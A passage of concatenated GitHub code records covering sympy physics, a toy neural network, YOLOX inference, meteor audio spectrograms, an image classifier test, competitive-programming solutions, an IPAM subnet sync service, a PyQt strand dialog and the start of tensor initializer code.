subs_k(save,i,Bound_nb)\n saveO = saveO+(save*e**i).xreplace({**dico0,**dico1})\n\n # saveO_m= saveO_m+e*((abc[3]*C.i+abc[4]*C.j+abc[5]*C.k)*ansatz.xreplace({kz:-sqrt(-kxl**2-kyl**2-I*omega/qRmm)})).xreplace({**dico0,**dico1})\n #saveO_m= saveO_m+e*((abc[3]*C.i+abc[4]*C.j+abc[5]*C.k)*ansatz.xreplace({kz:I*1e12})).xreplace({**dico0,**dico1})\n ####################\n ### PRESSURE ###\n ####################\n # Eb = dico1[BOx]*C.i+dico1[BOy]*C.j+dico1[BOz]*C.k\n # Bf = saveO[4]*C.i+saveO[5]*C.j+saveO[6]*C.k\n # PM = 1/2*((Eb*qAl+Bf).dot(Eb*qAl+Bf))\n #\n # avFp = (pressure(saveO[3],nsum,{**dico0,**dico1},1))\n # avPM = (pressure(PM,nsum,{**dico0,**dico1},1))\n # ft = mp.re(avFp-avPM)\n # print(ft)\n\n #######################\n ### Dissipation ###\n #######################\n # sm = 1000\n # sf =5e5\n # h_b = 100\n # V_b = mp.mpf('4e-5')\n # Om_b = mp.mpf('7.292e-5')\n # sig_b = (mp.mpf('1.00232')+1j*mp.mpf('2.5')*mp.mpf(1e-5))\n # L_b = 1e5\n # mu_b = 4*mp.pi*mp.mpf('1e-7')\n # rho_b = mp.mpf('1e4')\n # B_b = mp.mpf('5e-4')\n # N_b = mp.mpf('0.09')\n #\n #\n # b_f = ((saveO[4])*C.i+(saveO[5])*C.j+(saveO[6])*C.k)*mp.sqrt(rho_b*mu_b)*V_b\n # b_m = saveO_m*mp.sqrt(rho_b*mu_b)*V_b\n #\n # b_f = ((((b_f&C.i)+conjugate(b_f&C.i))*C.i + ((b_f&C.j)+conjugate(b_f&C.j))*C.j + ((b_f&C.k)+conjugate(b_f&C.k))*C.k)/2).xreplace({conjugate(x):x,conjugate(y):y,conjugate(z):z,conjugate(t):t})\n #\n # b_m = ((((b_m&C.i)+conjugate(b_m&C.i))*C.i + ((b_m&C.j)+conjugate(b_m&C.j))*C.j + ((b_m&C.k)+conjugate(b_m&C.k))*C.k)/2).xreplace({conjugate(x):x,conjugate(y):y,conjugate(z):z,conjugate(t):t})\n #\n # j_f = curl(b_f)/mu_b\n # j_m = curl(b_m)/mu_b\n #\n # Diss_f = 2*((j_f&C.i*conjugate(j_f&C.i))+(j_f&C.j*conjugate(j_f&C.j))+(j_f&C.k*conjugate(j_f&C.k)))/sf\n # Diss_m = 2*((j_m&C.i*conjugate(j_m&C.i))+(j_m&C.j*conjugate(j_m&C.j))+(j_m&C.k*conjugate(j_m&C.k)))/sm\n #\n # Fptay_f = (series(Diss_f,e,0,3).removeO()).xreplace({e:zeta,x:0,y:0,t:0}).xreplace(dico1)\n # Fptay_m =(series(Diss_m,e,0,3).removeO()).xreplace({e:zeta,x:0,y:0,t:0}).xreplace(dico1)\n #\n #\n # FFp_f = lambdify(z,Fptay_f,'mpmath')\n # FFp_m = lambdify(z,Fptay_m,'mpmath')\n # print('integrate')\n #\n # avFp_f= mp.quad(FFp_f,[-mp.inf,0],maxdegree 
=12,verbose = True)\n # avFp_m= mp.quad(FFp_m,[0,mp.inf],maxdegree =12,verbose = True)\n #\n # print(avFp_f,avFp_m)\n # avFp = avFp_f+avFp_m\n # ft = mp.re(avFp)*1.52e14\n #\n # print(ft)\n\n # Press[0,K] = sol[0]\n # Press[1,K] = sol[1]\n # Press[2,K] = sol[2]\n # Press[3,K] = 10**(Omeg)\n\n\n #~ print(Press)\n # Tangential stress saving\n # np.savetxt('kz_Alfven_pi2.out',Press)\n\n# Field Saving\n# files= open(\"sol_topo_wave\",\"w+\")\n# if Bound_nb ==2:\n# files.write(str({**dico1,**{\"Bound\":Bound_nb,'f1':str(((f-f0)).xreplace({**dico0,**dico1,**{C.x:Symbol('xx'),C.y:Symbol('yy')}})),'f2':str(((f_2-f0_2)).xreplace({**dico0,**dico1,**{C.x:Symbol('xx'),C.y:Symbol('yy')}}))}}))\n# if Bound_nb ==1:\n# files.write(str({**dico1,**{\"Bound\":Bound_nb,'f1':str(((f-f0)).xreplace({**dico0,**dico1,**{C.x:Symbol('xx')}}))}}))\n#\n# files.write(str(saveO.xreplace({e:dico1[zeta]})))\n# files.close()\n","repo_name":"monvilre/ToCCo","sub_path":"ToCCo.py","file_name":"ToCCo.py","file_ext":"py","file_size_in_byte":28026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72801719468","text":"\nimport numpy as np\nimport random\nimport copy\n\n\n\n\n#####################################################CLASSES####################################################\n\n\nclass network:\n\n #CONSTANTS:\n delta=1e-8\n\n\n\n\n def __init__(self,sizes):\n \"\"\"sizes: an array containing every layer's size\"\"\"\n #generates empty neurons\n self.neurons=np.empty(len(sizes),dtype=object)\n #must make one array not empty cuz of numpy weird stuff\n for i in range(len(sizes)):\n self.neurons[i]=np.array([0.0]*sizes[i])\n\n #generates empty weights\n self.weights=np.empty(len(sizes)-1,dtype=object)\n for i in range(len(sizes)-1):\n #what's the size of the current layer?\n fromLayer=sizes[i]\n #what's the size of the next layer?\n toLayer=sizes[i+1]\n #these are the x,y sizes of the array, respectively\n self.weights[i]=np.array([[0.0]*toLayer]*(fromLayer+1))\n \n #generates derivatives\n self.derivatives=copy.deepcopy(self.weights)\n self.backup=copy.deepcopy(self.weights) \n \n def activate(self):\n for x in range(len(self.neurons)-1):\n for i in range(len(self.neurons[x+1])):\n result=0\n #adds the weighted sum for a SINGLE NEURON\n for j in range(len(self.neurons[x])): \n result+=self.weights[x][j][i]*self.neurons[x][j]\n #adds the bias, which is the last element of the array\n result+=self.weights[x][len(self.weights[x])-1][i]\n result=sigmoid(result) \n self.neurons[x+1][i]=result\n \n #randomizes weights\n def initweights(self,multiplier):\n for i in range(len(self.weights)):\n for j in range(len(self.weights[i])):\n for k in range(len(self.weights[i][j])):\n self.weights[i][j][k]=sigmoid(random.randint(-2,2))*multiplier\n self.derivatives=copy.deepcopy(self.weights)\n\n def resetDerivatives(self):\n for i in range(len(self.derivatives)):\n for j in range(len(self.derivatives[i])):\n for k in range(len(self.derivatives[i][j])):\n self.derivatives[i][j][k]=0.0\n \n \n def clampDerivatives(self,sampleSize):\n \"\"\"gets the average of derivatives from total sample size\"\"\"\n for i in range(len(self.derivatives)):\n for j in range(len(self.derivatives[i])):\n for k in range(len(self.derivatives[i][j])):\n self.derivatives[i][j][k]=self.derivatives[i][j][k]/sampleSize\n\n\n def tweakWeights(self,learningRate):\n #print(\"The weights are tweaked at this rate:\")\n for i in range(len(self.weights)):\n for j in range(len(self.weights[i])):\n for k in 
range(len(self.weights[i][j])):\n #tweak weight opposite from gradient\n\n self.weights[i][j][k]-=self.derivatives[i][j][k]*learningRate\n #print(-self.derivatives[i][j]*learningRate)\n\n #USE ONLY FOR DEBUG\n def getCost(self,answer):\n \"\"\"compares the correct neural activations with the current activations(should be an array), returns a number\"\"\"\n \n result=0\n for i in range(len(answer)):\n result=result+abs(answer[i]-self.neurons[len(self.neurons)-1][i])\n return result\n \n def getDerivatives(self,answer):\n cost=0\n #gets cost of current network\n self.activate()\n for a in range(len(answer)):\n cost+=abs(answer[a]-self.neurons[len(self.neurons)-1][a])\n\n #tweaks every weight in order to get its derivative\n for i in range(len(self.weights)):\n for j in range(len(self.weights[i])):\n for k in range(len(self.weights[i][j])):\n #saves unchanged weight\n currentWeight=self.weights[i][j][k]\n \n self.weights[i][j][k]+=self.delta\n self.activate()\n alteredCost=0\n for l in range(len(answer)):\n alteredCost+=abs(answer[l]-self.neurons[len(self.neurons)-1][l])\n #gets the derivative\n deltaCost=alteredCost-cost\n self.derivatives[i][j][k]+=deltaCost/self.delta\n #restores the backup\n self.weights[i][j][k]=currentWeight\n \n def save(self):\n \"\"\"backup weights\"\"\"\n self.backup=copy.deepcopy(self.weights)\n \n def load(self):\n \"\"\"restores backup\"\"\"\n self.weights=copy.deepcopy(self.backup)\n \n def saveToData(self):\n \"\"\"saves the current weights to data file(named weights.txt), which is a plaintext file\"\"\"\n writtenStr=\"\"\n for i in range(len(self.weights)):\n for j in range(len(self.weights[i])):\n for k in range(len(self.weights[i][j])):\n writtenStr+=str(self.weights[i][j][k])\n writtenStr+=\" \"\n \n writtenStr+=\"\\n\"\n \n \n with open(\"weights.txt\",\"w\") as weightFile:\n weightFile.write(writtenStr)\n \n\n def loadFromData(self):\n with open(\"weights.txt\",\"r\") as weightFile:\n for i in range(len(self.weights)):\n currentarray=str.split(weightFile.readline())\n index=0\n for j in range(len(self.weights[i])):\n for k in range(len(self.weights[i][j])):\n self.weights[i][j][k]=float(currentarray[index])\n index+=1\n\n \n\n############################################################FUNCTIONS#####################################################################\ndef sigmoid(x):\n return(1/(1+np.exp(-x)))\n\n\n\n\n","repo_name":"Manaball123/python_projects","sub_path":"ai_project_1.2/neuralLib.py","file_name":"neuralLib.py","file_ext":"py","file_size_in_byte":5926,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20690310831","text":"import argparse\nimport os\n\nimport cv2\nimport numpy as np\nimport time\n\nimport onnxruntime\n\nfrom utils import preproc as preprocess , COCO_CLASSES, demo_postprocess, vis, multiclass_nms\n\nimport sys\nsys.path.append('../')\nfrom efficientstreamod.module import EfficientObjectDetection\n\n\nclass YOLOX(EfficientObjectDetection):\n def __init__(self, model_path, stream_url, input_shape=(640, 640), score_thr=0.3):\n super().__init__(stream_url)\n self.score_thr = score_thr\n self.input_shape = input_shape\n self.session = onnxruntime.InferenceSession(model_path)\n\n def inference(self, img):\n img, ratio = self.preprocess(img)\n output = self.session.run(None, {self.session.get_inputs()[0].name: img[None, :, :, :]})\n dets = self.postprocess(output, ratio)\n return dets\n\n def preprocess(self, img):\n img, ratio = preprocess(img, self.input_shape)\n return 
img, ratio\n\n    def postprocess(self, output, ratio):\n        predictions = demo_postprocess(output[0], self.input_shape)[0]\n        boxes = predictions[:, :4]\n        scores = predictions[:, 4:5] * predictions[:, 5:]\n        boxes_xyxy = np.ones_like(boxes)\n        boxes_xyxy[:, 0] = boxes[:, 0] - boxes[:, 2]/2.\n        boxes_xyxy[:, 1] = boxes[:, 1] - boxes[:, 3]/2.\n        boxes_xyxy[:, 2] = boxes[:, 0] + boxes[:, 2]/2.\n        boxes_xyxy[:, 3] = boxes[:, 1] + boxes[:, 3]/2.\n        boxes_xyxy /= ratio\n        dets = multiclass_nms(boxes_xyxy, scores, nms_thr=0.45, score_thr=self.score_thr)\n        return dets\n\n    def visualize(self, img, dets):\n        if dets is not None:\n            final_boxes, final_scores, final_cls_inds = dets[:, :4], dets[:, 4], dets[:, 5]\n            img = vis(img, final_boxes, final_scores, final_cls_inds,\n                      conf=self.score_thr, class_names=COCO_CLASSES)\n        return img\n\n\ndef make_parser():\n    parser = argparse.ArgumentParser(\"onnxruntime inference sample\")\n    parser.add_argument(\n        \"-m\",\n        \"--model\",\n        type=str,\n        default=\"yolox_s.onnx\",\n        help=\"Input your onnx model.\",\n    )\n    parser.add_argument(\n        \"-i\",\n        \"--image_path\",\n        type=str,\n        default='cars.mp4',\n        help=\"Path to your input video or stream.\",\n    )\n    parser.add_argument(\n        \"-o\",\n        \"--output_dir\",\n        type=str,\n        default='demo_output',\n        help=\"Path to your output directory.\",\n    )\n    parser.add_argument(\n        \"-s\",\n        \"--score_thr\",\n        type=float,\n        default=0.3,\n        help=\"Score threshold to filter the result.\",\n    )\n    parser.add_argument(\n        \"--input_shape\",\n        type=str,\n        default=\"640,640\",\n        help=\"Specify an input shape for inference.\",\n    )\n    return parser\n\n\nif __name__ == '__main__':\n    args = make_parser().parse_args()\n\n    input_shape = tuple(map(int, args.input_shape.split(',')))\n\n    yolox = YOLOX(args.model, args.image_path, input_shape, args.score_thr)\n    yolox.start_stream(grid_type=4)\n    time.sleep(1)\n    while True:\n        img,dets = yolox.get_result()\n        dets = np.array(dets)\n        if img is not None:\n            img = yolox.visualize(img, dets)\n            cv2.imshow('result', img)\n        if cv2.waitKey(1) == ord('q'):\n            break\n        time.sleep(0.03)","repo_name":"rubythalib33/EfficientStreamOD","sub_path":"sample/yolox_s.py","file_name":"yolox_s.py","file_ext":"py","file_size_in_byte":3310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"27756209145","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.signal import stft\nimport meteordoctorlib as mdl\n\n## Settings\nplot_spec = False\n\n## Some constants\ntarget_buffer_len = 8000\nNOVERLAP = 0.8\nspec_xy = 256\nnorm_aspect = 1.5\n\nMINF = 500\nMAXF = 1500\n\n## Filename\nfn = \"sample_meteor_data_v4.wav\"\n\n### Load main file\ndef process_wav_file(fn):\n\n    fs, file_len, main_buffer = mdl.load_wav_file(fn)\n\n    length = (fs/1000)*target_buffer_len\n    length = mdl.power_bit_length(length)\n\n    buf_no = int(np.floor(file_len/(length)))\n\n    print(\"Length of buffer: \", length/fs, \"s\")\n    print(\"%i buffers filled\" % buf_no)\n    for i in range(0, buf_no*2-1):\n        ## We're going to do buffer overlap to ensure that nothing is missed!\n        print(\"Processing buffer %i of %i\" % (i+1 , buf_no*2))\n        ## Read audio data into memory\n        shifter = i/2 ## 1/2 1/2 buffer overlap\n        in_frame = mdl.import_buffer(main_buffer, fs, shifter*length, (shifter+1)*length)\n        #print(\"Data Len: \", len(in_frame))\n        ## Lets do stuff!\n        NFFT = mdl.calculate_nseg(length)\n\n        #print(\"NFFT,\", NFFT)\n        f, t, Zxx = stft(in_frame, fs=fs, nperseg=NFFT, noverlap=NFFT*NOVERLAP)\n        mag = np.abs(Zxx)\n\n        signal_dict = {}\n
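        # Collect the raw samples and sample rate here; the cropped, normalised\n        # spectrogram is added below so each saved buffer is self-contained.\n        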
signal_dict['data'] = in_frame\n        signal_dict['fs'] = fs\n        minf = NFFT*MINF/fs\n        maxf = NFFT*MAXF/fs\n        signal_dict['magnitude'] = mdl.normalise_spectrogram(mag[int(minf):int(maxf), ...], newx=int(spec_xy*norm_aspect), newy=int(spec_xy))\n        mdl.save_buffer(signal_dict)\n        if plot_spec:\n            plt.subplot(2, 1, 1)\n            plt.pcolormesh(t, f, mag, cmap='viridis')\n            plt.ylabel('Frequency [Hz]')\n            plt.xlabel('Time [sec]')\n            plt.ylim((MINF,MAXF))\n\n            plt.subplot(2, 1, 2)\n            mag = np.square(mag)\n            plt.pcolormesh(t, f, mag, cmap='viridis')\n            plt.ylabel('Frequency [Hz]')\n            plt.xlabel('Time [sec]')\n            plt.ylim((MINF,MAXF))\n            plt.show()\n\nprocess_wav_file(fn)\n","repo_name":"m0zjo-code/meteordoctor","sub_path":"wav_client.py","file_name":"wav_client.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"33297797350","text":"from tensorflow.keras.preprocessing.image import load_img\nfrom tensorflow.keras.preprocessing.image import img_to_array\nfrom tensorflow.keras.models import load_model\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nimport os\n\ndef search(dirname):\n    img_list = []\n    for (path, dir, files) in os.walk(dirname):\n        for filename in files:\n            ext = os.path.splitext(filename)[-1]\n            if ext == '.jpg':\n                img_list.append(path+'/'+filename)\n    return img_list\n\n# load and prepare the image\ndef load_image(filename):\n    # load the image\n    img = load_img(filename, target_size=(200, 200))\n    # convert to array\n    img = img_to_array(img)\n    # reshape into a single sample with 3 channels\n    img = np.expand_dims(img, axis=0)\n    # img scaling\n    img /= 255\n\n    return img\n\nimg_list_1 = search('data_natural_image/test/temp')\n\nmodel = load_model('./natural_image_model.h5')\n\nfor i in img_list_1:\n    img = load_image(i)\n    # predict the class\n    result = model.predict(img)\n    preds_value = np.argmax(result, axis=-1)[0]\n\n    print(preds_value)\n\n","repo_name":"MinseongS/AI-study","sub_path":"CNN/natural-image/natural_image_test.py","file_name":"natural_image_test.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"44462316957","text":"import sys\n\ninput = sys.stdin.readline\nN = int(input())\narr = list(map(int, input().split()))\nre_arr = list(reversed(arr))\nasc = [1] * N\ndesc = [1] * N\n\nfor i in range(N):\n    for j in range(i):\n        if arr[i] > arr[j]:\n            asc[i] = max(asc[i], asc[j] + 1)\n        if re_arr[i] > re_arr[j]:\n            desc[i] = max(desc[i], desc[j] + 1)\nprint(max([i + j for i, j in zip(asc, reversed(desc))])-1)\n","repo_name":"joohyun333/programmers","sub_path":"백준/DP/가장 긴 바이토닉 부분 수열.py","file_name":"가장 긴 바이토닉 부분 수열.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"70231898666","text":"# Baekjoon 1316\n# Group word checker\n\nN = int(input())\ncount = 0\n\nfor i in range(N):\n    word = input()\n    prev_w = []\n    duplication = 0\n    for idx in range(len(word)):\n        if word[idx] not in prev_w:\n            prev_w.append(word[idx])\n        elif word[idx] != prev_w[-1]: # seen before in prev_w, but not the immediately preceding letter\n            duplication = 1\n            break\n    if duplication == 0:\n        count+=1\n\nprint(count)\n
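# Note: a \"group word\" is one in which every repeated letter occurs in a single\n# consecutive run; prev_w tracks the letters seen so far to detect violations.\n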
","repo_name":"noweymik/Coding-Test-Study","sub_path":"BAEKJOON/2023/1316.py","file_name":"1316.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"29970334696","text":"\"\"\"\nService object by Collections.\n\"\"\"\nfrom dynaconf import settings\n\nfrom .auth import IpamSession\nfrom .database import MongoDB, RedisDB\nfrom .service_ipam import IpamService\n\n\nclass IpamFacade:\n \"\"\"\n class Facade Ipam\n \"\"\"\n\n def __init__(self):\n self._cache = RedisDB(8)\n self._session = IpamSession.session()\n self._mongo = MongoDB()\n\n def get_vrf(self):\n \"\"\"\n Realiza busca por todas as VRFs cadastradas no IPAM. A VRF é responsavel pelo NEXT_HOP para cada subnet.\n\n :param: None\n :return: Dict = { vrf_id:\n { next_hop: str, vrf_name: str, vrf_id: str, sections_list: list }\n }\n \"\"\"\n print(\"Iniciando busca por vrf...\")\n\n vrf_data: dict = {}\n\n get_vrf = IpamService.get(\n controller=\"vrf\",token= self._session\n )\n\n for vrf in get_vrf[\"data\"]:\n next_hop = vrf.get(settings.RANGER_NEXT_HOP)\n vrf_name = vrf.get(\"name\")\n vrf_id = vrf.get(\"vrfId\")\n sections_list = list(vrf.get(\"sections\").split(\";\"))\n\n vrf_data[vrf_id] = {\n \"next_hop\":next_hop,\n \"vrf_name\":vrf_name,\n \"vrf_id\":vrf_id,\n \"sections_list\":sections_list\n }\n\n print(\"VRF`s encontradas com sucesso: %s\" % vrf_data)\n return {\"status\":\"success\", \"message\":\"vrf sucesso\", \"data\":vrf_data}\n\n def get_sections(self):\n \"\"\"\n Realiza busca por todas as sections cadastradas no IPAM. A section é responsavel por agrupar as subnets.\n :return: Dict = { sections_list: list }\n :param: None\n \"\"\"\n print(\"Iniciando busca de sections ipam...\")\n\n sections_data = []\n get_sections = IpamService.get(controller=\"sections\",token=self._session)\n\n for section in get_sections[\"data\"]:\n section_name = section.get(\"name\")\n section_id = section.get(\"id\")\n if section_name in [\"ASN-INVALIDOS\", \"ASN-CGNAT\"]:\n continue\n\n sections_data.append({\n \"name\": section_name,\n \"id\":section_id\n })\n\n print(\"Sections encontradas com sucesso: %s\" % sections_data)\n return {\"status\":\"success\", \"message\":\"sections sucesso\", \"data\":sections_data}\n\n def get_subnets(self,sections_id: str, sections_name: str, vrf_item: dict):\n \"\"\"\n Realiza busca por todas as subnets cadastradas no IPAM. 
A subnet é responsavel por agrupar as redes.\n :return: Dict = { subnet_list: list }\n :param: sections_id: str ex.: 1\n :param: sections_name: str ex.: 265066\n :param: vrf_item: dict ex.: { next_hop: str, vrf_name: str, vrf_id: str, sections_list: list }\n \"\"\"\n print(\"Iniciando busca subneting no ipam...\")\n\n subnet_data = []\n params = {\n \"filter_match\": \"full\",\n \"filter_by\": \"mask\",\n \"filter_value\": \"24\"\n }\n\n get_subnet = IpamService.get_filter_object(\n controller=f\"sections/{sections_id}/subnets/\",token=self._session, params=params\n )\n\n for subnet in get_subnet[\"data\"]:\n subnet_id = subnet.get(\"id\")\n subnet_community_ddos = subnet.get(\"custom_community_ddos\")\n subnet_vrf = subnet.get(\"vrfId\")\n subnet_networks = subnet.get(\"subnet\")\n whitelist = subnet.get(\"custom_networks_whitelist\")\n if whitelist == \"1\":\n self._cache.save(key=f\"whitelist_{subnet_networks}\", obj=subnet_networks, ex_token=89000)\n\n if not vrf_item.get(subnet_vrf):\n next_hop = \"0.0.0.0\"\n print(\n f\"*****>>>>> Subnet sem VRF <<<<<******* - net: {subnet_networks} - asn: {sections_name}\"\n )\n else:\n next_hop = vrf_item[subnet_vrf][\"next_hop\"]\n\n\n subnet_dict = {\n \"_id\" : subnet_id,\n \"id\" : subnet_id,\n \"net\" : subnet_networks,\n \"asn\" : sections_name,\n \"hop\" : next_hop,\n \"whitelist\" : whitelist,\n \"community_ddos\": int(subnet_community_ddos),\n \"guard\" : \"0\"\n }\n self._cache.save(key=f\"network_{subnet_networks}\", obj=subnet_networks, ex_token=89000)\n self._mongo.find_and_update_by_options(coll=\"subnet\", value_id={\"_id\" : subnet_id}, value_update=subnet_dict)\n subnet_data.append(subnet_dict)\n return {\"status\":\"success\", \"message\":\"subneting sucesso\", \"data\":subnet_data}\n","repo_name":"deivisonmarteleto/fastnetmon_sync_ranger","sub_path":"src/app/facade_ipam.py","file_name":"facade_ipam.py","file_ext":"py","file_size_in_byte":4671,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"33512306029","text":"from PyQt6 import uic\nfrom PyQt6.QtCore import QTimer, pyqtSignal\nfrom PyQt6.QtGui import QBrush, QColor\nfrom PyQt6.QtWidgets import QDialog, QColorDialog, QGraphicsScene\n\nfrom structures.points import NEMid, Nucleoside\nfrom structures.strands import Strand\nfrom ui.dialogs.sequence_editor.display_area import SequenceDisplayArea\nfrom ui.dialogs.sequence_editor.sequence_editor import SequenceEditor\n\n\nclass StrandConfig(QDialog):\n updated = pyqtSignal()\n\n max_thickness = 50\n\n def __init__(self, parent, strand: Strand):\n super().__init__(parent)\n uic.loadUi(\"ui/dialogs/strand_config/strand_config.ui\", self)\n\n self.strand = strand\n self.setWindowTitle(\n f\"Strand #{self.strand.strands.index(self.strand) + 1} Config\"\n )\n self._sequencing()\n self._color_selector()\n self._thickness_selector()\n self._strand_params()\n\n self.strand.styles.highlight()\n\n self.finished.connect(self.when_finished)\n\n def when_finished(self) -> None:\n self.strand.styles.reset()\n self.updated.emit()\n\n def _strand_params(self):\n \"\"\"Setup parameters based on strand parameters.\"\"\"\n self.NEMids_in_strand.setValue(len(self.strand.items.by_type(NEMid)))\n self.nucleosides_in_strand.setValue(len(self.strand.items.by_type(Nucleoside)))\n self.closed.setChecked(self.strand.closed)\n self.empty.setChecked(self.strand.empty)\n self.thickness.blockSignals(True)\n self.thickness.setValue(round(min((self.strand.styles.thickness.value, 99))))\n 
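        # Signals were blocked above, so the programmatic setValue does not emit\n        # valueChanged and re-trigger the update handlers while seeding the widget.\n        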
self.thickness.blockSignals(False)\n\n def _sequencing(self):\n \"\"\"Set up the sequencing area.\"\"\"\n\n # add the strands display area\n self.sequence_display = SequenceDisplayArea(None, self.strand.sequence)\n self.sequencing_area.layout().insertWidget(0, self.sequence_display)\n\n def sequencing_editor_clicked():\n \"\"\"Worker for when 'sequence editor' is clicked.\"\"\"\n self.strand.sequence = SequenceEditor.fetch_sequence(\n self.parent(), self.strand.sequence, self.strand.has_complements()\n )\n self.sequence_display.bases = self.strand.sequence\n self.updated.emit()\n\n self.sequence_editor.clicked.connect(sequencing_editor_clicked)\n\n def _color_selector(self):\n \"\"\"Set up the color selector.\"\"\"\n\n # set up the color preview box\n self.color_preview.setScene(QGraphicsScene())\n\n def update_color_preview():\n \"\"\"Update the color preview box to the current strand color.\"\"\"\n self.color_preview.scene().setBackgroundBrush(\n QBrush(QColor(*self.strand.styles.color.value))\n )\n\n # strand color could change for many reasons other than them using the color\n # selector so for ease we will just automatically update the preview box\n # every .1 seconds with the current strand color (this is an unideal\n # solution, but it works perfectly fine)\n update_color_preview()\n update_color_looper = QTimer(self)\n update_color_looper.timeout.connect(update_color_preview)\n update_color_looper.start(100)\n\n def color_chooser_clicked():\n \"\"\"Worker for when the color chooser box is clicked.\"\"\"\n self.auto_color.setChecked(False)\n self.strand.styles.color.value = QColorDialog.getColor().getRgb()\n self.strand.styles.color.automatic = False\n self.strand.strands.style()\n update_color_preview()\n self.updated.emit()\n\n self.color_chooser.clicked.connect(color_chooser_clicked)\n\n # update the auto color checkbox to the current state of the strand\n self.auto_color.setChecked(self.strand.styles.color.automatic)\n\n def auto_color_checked(checked):\n \"\"\"Worker for when the auto color checkbox is clicked.\"\"\"\n if checked:\n self.strand.styles.color.automatic = True\n else:\n self.strand.styles.color.automatic = False\n self.updated.emit()\n\n self.auto_color.stateChanged.connect(auto_color_checked)\n\n def _thickness_selector(self):\n \"\"\"Set up the thickness selector.\"\"\"\n\n def slider_to_thickness():\n \"\"\"Map the thickness slider to the strand thickness.\"\"\"\n return int((self.thickness.value() * self.max_thickness) / 99)\n\n def thickness_to_slider():\n \"\"\"Map the strand thickness to the thickness slider.\"\"\"\n return int((self.strand.styles.thickness.value * 99) / self.max_thickness)\n\n # update the thickness based on the current strand's thickness\n self.auto_thickness.setChecked(self.strand.styles.thickness.automatic)\n\n def thickness_changed():\n \"\"\"Worker for when the thickness slider is changed.\"\"\"\n self.auto_thickness.setChecked(False)\n self.strand.styles.thickness.value = slider_to_thickness()\n self.updated.emit()\n\n self.thickness.setValue(thickness_to_slider())\n self.thickness.valueChanged.connect(thickness_changed)\n\n def auto_thickness_checked(checked):\n \"\"\"Worker for when the auto thickness checkbox is checked.\"\"\"\n self.strand.styles.thickness.automatic = checked\n self.updated.emit()\n\n 
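        # stateChanged delivers Qt's check-state as a plain int (0 or 2), which\n        # the handler above stores directly in thickness.automatic.\n        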
self.auto_thickness.stateChanged.connect(auto_thickness_checked)\n","repo_name":"NATuG3/NATuG3","sub_path":"ui/dialogs/strand_config/strand_config.py","file_name":"strand_config.py","file_ext":"py","file_size_in_byte":5451,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"38729765395","text":"from collections import deque\n\ndef solution(s):\n answer = 0\n s = deque(list(s))\n \n while s:\n x = s.popleft()\n answer += 1\n \n cnt_x, cnt_not_x = 1, 0\n for _ in range(len(s)):\n ch = s.popleft()\n \n if x == ch:\n cnt_x += 1\n else:\n cnt_not_x += 1\n \n if cnt_x == cnt_not_x: \n break\n \n elif not s:\n break\n \n return answer\n\n\nif __name__ == \"__main__\":\n print(solution(\"banana\")) # 3\n print(solution(\"abracadabra\")) # 6\n print(solution(\"aaabbaccccabba\")) # 3","repo_name":"nstalways/Algorithm-Questions","sub_path":"01_Strings/Programmers_문자열_나누기.py","file_name":"Programmers_문자열_나누기.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7647878015","text":"\"\"\"\nAdopted from AllenNLP:\n https://github.com/allenai/allennlp/blob/v0.6.1/allennlp/nn/initializers.py\n\nAn initializer is just a PyTorch function.\nHere we implement a proxy class that allows us\nto register them and supply any additional function arguments\n(for example, the ``mean`` and ``std`` of a normal initializer)\nas named arguments to the constructor.\nThe available initialization functions are\n* `\"normal\" `_\n* `\"uniform\" `_\n* `\"constant\" `_\n* `\"eye\" `_\n* `\"dirac\" `_\n* `\"xavier_uniform\" `_\n* `\"xavier_normal\" `_\n* `\"kaiming_uniform\" `_\n* `\"kaiming_normal\" `_\n* `\"orthogonal\" `_\n* `\"sparse\" `_\n* :func:`\"block_orthogonal\" `\n* :func:`\"uniform_unit_scaling\" `\n\"\"\"\nimport re\nimport math\nfrom typing import Callable, List, Tuple, Type, Iterable\nimport itertools\n\nimport torch\nimport torch.nn.init\n\nfrom stog.utils import logging\nfrom stog.utils.checks import ConfigurationError\n\nlogger = logging.init_logger() # pylint: disable=invalid-name\n\n\ndef uniform_unit_scaling(tensor: torch.Tensor, nonlinearity: str = \"linear\"):\n \"\"\"\n An initaliser which preserves output variance for approximately gaussian\n distributed inputs. This boils down to initialising layers using a uniform\n distribution in the range ``(-sqrt(3/dim[0]) * scale, sqrt(3 / dim[0]) * scale)``, where\n ``dim[0]`` is equal to the input dimension of the parameter and the ``scale``\n is a constant scaling factor which depends on the non-linearity used.\n See `Random Walk Initialisation for Training Very Deep Feedforward Networks\n `_\n for more information.\n Parameters\n ----------\n tensor : ``torch.Tensor``, required.\n The tensor to initialise.\n nonlinearity : ``str``, optional (default = \"linear\")\n The non-linearity which is performed after the projection that this\n tensor is involved in. This must be the name of a function contained\n in the ``torch.nn.functional`` package.\n Returns\n -------\n The initialised tensor.\n \"\"\"\n size = 1.\n # Estimate the input size. 
